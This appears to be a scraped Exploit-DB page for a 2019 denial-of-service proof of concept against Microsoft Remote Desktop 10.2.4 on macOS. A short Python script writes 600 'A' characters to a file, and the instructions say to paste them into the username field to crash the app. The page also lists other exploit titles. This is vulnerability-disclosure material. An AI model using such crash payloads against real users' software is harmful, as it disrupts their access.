Microsoft Remote Desktop 10.2.4(134) – Denial of Service (PoC)

Exploit Database
19 阅读

作者： Saeed Hasanzadeh

日期： 2019-01-24
类别：
- dos
平台：
- macos
来源：https://www.exploit-db.com/exploits/46236/

# Exploit Title: Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
# Date: 2019/01/24
# Author: Saeed Hasanzadeh (Net.Hun73r)
# Twitter: @nethun73r
# Software Link: https://itunes.apple.com/us/app/microsoft-remote-desktop-10/id1295203466?mt=12
# Version: 10.2.4(134)
# Tested on: Mac OS Mojave(10.14.2)

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the add Desktop > add user account >UserName
# App will now crash

buffer = "A" * 600
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

last Exploits
Microsoft Remote Desktop 10.2.4(134) – Denial of Service (PoC)的更多信息

Axessh 4.2 – Denial of Service：
Wireshark – file_read ‘wtap_read_bytes_or_eof/mp2t_find_next_pcr’ Stack Buffer Overflow：
XAMPP Control Panel – Denial Of Service：
Mereo 1.9.2 – Remote HTTP Server Denial of Service：
Adobe Flash – Drawing Methods ‘this’ Use-After-Free：
RarmaRadio 2.72.4 – ‘server’ Denial of Service (PoC)：
Microsoft Edge Chakra JIT – Incorrect Bounds Calculation：
PHP Session Deserializer – Use-After-Free：